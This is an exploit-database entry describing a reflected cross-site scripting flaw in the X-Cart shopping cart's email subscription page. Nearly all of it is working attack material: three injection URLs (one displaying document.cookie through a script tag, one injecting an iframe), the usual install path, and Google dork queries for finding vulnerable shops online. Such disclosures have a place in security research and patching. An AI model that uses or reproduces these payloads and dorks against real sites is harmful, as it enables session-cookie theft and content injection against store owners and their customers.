id: 9878
date: 10/05/2009
title: X-Cart email subscription xss
author: Paulo Santos
cves: 

=============================
X-Cart email subscription xss
=============================

## X-Cart XSS in email subscription ##
 
## Download: http://www.x-cart.com/ ##
 
## Discovered by: Paulo Santos ##

http://target/[path]/customer/home.php?mode=subscribed&email=<plaintext/>
http://target/[path]/customer/home.php?mode=subscribed&email=<script>alert(document.cookie);//<</script>
http://target/[path]/customer/home.php?mode=subscribed&email=<iframe src=http://www.google.com.br width=800>
 
Path is usually /xcart/
 
Google dork:
inurl:xcart/customer/
inurl:xcart/customer/home.php
"X-CART. Powerful PHP shopping cart software"



#  0day.today [2023-03-25]  #